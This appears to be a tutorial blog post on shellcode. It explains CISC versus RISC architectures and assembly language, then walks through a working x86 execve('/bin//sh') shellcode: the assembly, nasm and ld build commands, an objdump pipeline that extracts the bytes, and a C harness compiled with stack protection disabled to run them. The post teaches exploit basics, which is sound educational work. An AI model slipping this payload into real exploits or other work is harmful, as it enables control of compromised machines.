A shellcode is a small piece of code used as the payload while exploiting. It is used to start a command shell from which the attacker can control the compromised machine.
Shell coding is basically a list of carefully crafted instructions that can be executed once the code is injected into a running application. The kernel understands what the shellcode is what to do with it.
The shell code does not need a complier or interpreter to execute it as the data is sent in a raw format.
Let’s take a C code and convert into assembly code.
Shellcodes can be written in two architectures namely x86-64(Intel) Processors and ARM Processors. The number of devices that feature an ARM processor are relatively high when compared to Intel Processors.
Intel is a CISC (Complex Instruction Set Computing) processor that has a larger and more feature-rich instruction set and allows many complex instructions to access memory whereas ARM is a RISC (Reduced instruction set Computing) processor and therefore has a simplified instruction set (100 instructions or less) and more general purpose registers than CISC.
CISC has more operations when compared to RISC, addressing modes, but less registers than ARM. CISC processors are mainly used in normal PC’s, Workstations, and servers. RISC processors are mainly used in phones, routers, and IoT devices.
In RISC the instructions can be executed more quickly, potentially allowing for greater speed (RISC systems shorten execution time by reducing the clock cycles per instruction).
Figure 1 describes what type of language is more computer and human friendly. Languages such as C,C++, Python are more programmer friendly whereas Assembly languages written are more machine friendly.
Our computer can’t run assembly code itself, because it needs machine code. Assembly language is a thin syntax layer present on top of the machine code which is composed of instructions, that are encoded in binary representations (machine code), which is what our computer understands. It is difficult to write code in machine so we use write assembly languages, which are much easier for humans to understand.
Figure 1: Language hierarchy
Here is an example of a machine language instruction:
1110 0001 1010 0000 0010 0000 0000 0011
But we can’t remember the pattern so mnemonics are used. These mnemonics are the abbreviations that help us remember to these binary patterns, where each machine code instruction is given a name. These mnemonics mostly consist of three letters, but this is not obligatory.
We write a program using these mnemonics as instructions. The resulting program is called an Assembly language program, and the set of mnemonics that is used to represent a computer’s machine code is called the Assembly language of that computer.
Shellcode Example
We will be using assembly language code for generating the shellcode. We get the most efficient lines of codes when we go to machine level. Since we cannot go up with binaries, we will be coding in semi machine code-assembly language with which we will generate the useful and efficient shellcode.
The below code in written in assembly
section .text global _start _start: ;execve(argv[0], argv, NULL); xor ecx, ecx mul ecx push ecx push 0x68732f2f # reverse /sh i.e., hs/ hex value is 68732f2f push 0x6e69622f # similar to above mov ebx, esp mov al, 11 int 0x80
Compile using:
nasm -f elf32 shell.asm
link the file by using the below command:
ld -melf_i386 -o shell shell.o
Extracting hex code from the above code by using the below commands:
objdump -d shell
objdump -d shell | grep -Po '\s\K[a-f0-9]{2}(?=\s)' | sed 's/^/\\x/g' | perl -pe 's/\r?\n//' | sed 's/$/\n/'
# here shell is the file name
We will use the hex code extracted from it in the below C Code:
Using Extracted hex code as a shell code in a C program:
#include #include unsigned char shellcode[]="\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"; int main(){ int(*f)() = (int(*)())shellcode; f(); return 0; }
Compiling and Running it:
gcc -m32 -fno-stack-protector -z execstack -o cshell cshell.c ./cshell
Shellcode specific aspects
Things to note when writing a shell code
- Don’t use direct offsets to strings
- Avoid NULL Bytes when writing a shell code